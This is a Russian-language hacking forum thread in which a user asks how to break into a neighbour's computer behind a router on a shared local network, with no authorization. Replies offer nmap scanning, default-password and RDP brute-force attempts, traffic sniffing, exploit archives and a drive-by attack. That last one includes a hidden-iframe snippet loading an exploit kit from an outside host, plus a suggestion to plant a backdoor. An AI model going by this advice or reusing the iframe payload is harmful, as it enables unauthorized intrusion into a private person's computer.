Такая проблема : ...стоит у нас на районе локальная сеть на свичах , но один комп подключен к сети через Роутер .... в общем как обойти роутер , и вообще как такой комп взломать ? Спасибо за любую информацию по ТЕМЕ ! P.S. RadMin не предлагать так как за компом редко кто сидит и ничего и не от кого не принимает (ПАРАНОИК Наверное) =)
роутер - на сколько я знаю это когда все порты закрыты кроме тех что указаны в настройках модема.. проскань его каким ни будь сканером на открытые порты а потом уже думать будем..
так вот тут и проблема ... сканировал его XSpiderom7 ... ничего не нашел - вообще ! К нему даже пинг не проходит , хотя он в чяте присутствует .... иногда даже общается ! В Nmap - Zenmap GUI подскажите подходящий набор ключей для такого скана , или другой подходящий сканер ! ========================== Быстрой трассировкой нарыл : в PORT STATE SERVICE 22/tcp filtered ssh 23/tcp filtered telnet 25/tcp filtered smtp 80/tcp filtered http 3389/tcp filtered ms-term-serv как я понял тут все фильтруетсо ..... Идеи есть ?
хмм. роутер похду на freebsd крутится, и адин не лошара . мне кажется тупо нарыватся на него - не стоит. надо найти другие методы. например сканировать обшая сеть, искать хосты, которые исключены от ошбего правила на роутере, и уже копать на этом направлением.
Там винда ХР - ето гарант ! Он иногда играет с нами в КС или в ВрКрайт ))) Нащет исключенных хостов - как узнать какие исключены в правилах ???
наивный ты, чувак роутер - это не игровая станция, ибо админ - идиот. и как я понял из скана - админ НЕ идиот, по этому ротер, который режет и фильтрирует все, это отдельное устройство. если он раздает инет или какой-то сервер там серьезный, то вероятно стоит нормлаьные сетевые обарудование. лично у меня дома, до моего компа, на котором стоит WIND XP (просто я не играю в игрушки) стоит роутер DSL, который может филтровывать трафик, не отвечать на пинги и т.д. так что это нормальное явление. а насчет исключаюших правил - надо подробно изучать топологию вашего сети, кто что раздает, что где находится ! да и в чем заключается взлом именно этго роутера? что это вам даст? что вам нужен? показать какой ты крутой? или испытывать моги античата? ))
1-е: Что есть "моги" ? мб "мозги" ) 2-е: Взломать нужно комп что стоит за етим роутером ! 3-е: Взлом сам ради интереса , просто что то захотелось попробовать ! Так что будут какие то идеи и советы ? =) Может чтиво есть какое !
взлом за интерес ! приколько... а ты знаешь что такое игра на интерес ? - выложи полный лог из сканера Xpider 7. - какой уровень знание у этого типа? троянить не вариант? - его видно в сетевом окружение (если у вас говоришь локальная сеть). у него есть расшаренные папки? - поставь у себя прога IP SCOPE и выбей его адрес (локальный, из твоей подсети) и смотрив открытые ресурсы да много способов собрать информацию.. а потом уже можно будет искать уязвимости к этим направлениям ! P.S. чувак, а вообше-то не советовал плюнуть в колодец. это тебе, на будущее...
немучийся проверь на стандартный пароль маршрутизатор если неполучится забей даже если у него стоит бажная ХП тебе от этого ничег онебудет,т.к. порты видно непроброшены с "железки" и значит все что ты бдуешь делать - это портить сеть канал)
замани его на страницу со сплоитом, залей ему клиентскую часть бекдора или чегото подобного, у себя поставь серверную ну ты меня понял
2 Pernat1y : Чем ето можно сбрутить ? Подскажи софтину ! 2 plas : Подскажи где можно залить список етих стандартных паролей к роутеру - если такие есть !? =) 2 B1t.exe XSpider 7.7 лог на "Стандартном" скане : Хост 192.168.163.45 Информация При сканировании данного хоста открытых портов не обнаружено. Время отклика: хост не отвечает на запросы Параметры сканирования Начало сканирования: 12:56:14 04.03.2009 Время сканирования: 00:07:20 Версия: 7.7 Demo Build 3100 Профиль: DefaultOff.prf ========= LanScope ево не находит ! Пинг ево не пробивает ! =========
043nKRuT0y узнай модель роутера сначала. проскань нмапом роутер nmap -PN -sV -O 123.123.123.123 и покажи что вывелось
http://www.google.com/search?q=rdp+bruteforce зы. thc-hydra вроде умела зыы. для начала просто попробуй Администратор/Administrator без пароля. бывает ) например http://virus.org/default-password
2 SVAROG Вот кажись НМап нарыл модель роутера ) Starting Nmap 4.76 ( http://nmap.org ) at 2009-03-05 14:38 Московское время (зима) All 1000 scanned ports on 192.168.163.45 are filtered MAC Address: 00:19:5B:E2:AD:39 (D-Link) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop ================ и еще : где можно примеры страниц со сплоитом взять ! Я етим еще не стыкалса на практике - только чтиво ( ================ Может ево трафик поснифать ? Подскажите что именно в Cain&Abel нужно настроить ? ================ Насчет сети : Етот чел ничего не раздает , он даже не админ - сидит себе целый день в Старку по нету рубит ! В сети есть 4ри диапазона 192.168.163.ххх 192.168.160.ххх 192.168.7.ххх 192.168.161.ххх и-нет раздается из 192.168.163.1 для 192.168.163.ххх ну и соответственно остальным также ! есть адреса ДНС сервера и Альтернативного ДНС сервера ! Все адреса указываются пользователям каждому отдельно ! Ну и стоит клиент - серверный чат на 192.168.7.4 ! Стоит также файлообменный сервер с фильмами и прочей лабудой ! Кстати на тачке с Чатом стоит мой Радмин ) На файлообменнике стоит UNIX система с ftp 21 порту ! пробовал туда конекитса - запрашивает логин и пароль ! На 445 порту есть удаленное управление реестром !\ Мб ето как то поможет в чем то ?! ==================== Какие мысли будут ? =)
очень даже интересный порт, если он под WINDOWS XP. есть один замечательный человек - stopxaker, глянь в статью: /threadnav99665-1-10.html ------------- ищи здесь: http://milw0rm.org/
страница со сплоитом это тоже самое, что любая страница на которой размещен нефидимый фрейм, например <iframe src="http://domain.com/sploit/" width="1" height="1" style="visibility:hidden"> где http://domain.com/sploit/ это путь до связки сплоитов, а их огромное множество но это вариант далеко не эффективный, если учитывать что пробив по новым версиям лисы и оперы не больше 1%
пилять. а через веб интерфейс подключится ты пробывал? Может на маршрутезаторе (роутере) паса ваще нету
А что ему это даст? ну подберет он пасс, залезет на роутер, ну собьет он там все настройки... Ему ж на комп надо! Или Я чего-то не вкуриваю?
2 gold-goblin : Ану ко про веб интерфейс поподробней =) Вот если на роутер попасть и настройки сбить так может удастся XSpider-om порты просканить на дыры !!! 2 vp$ : Посоветуй какие то связки может он браузер не патчит , или вообще сидит на ИЕ =)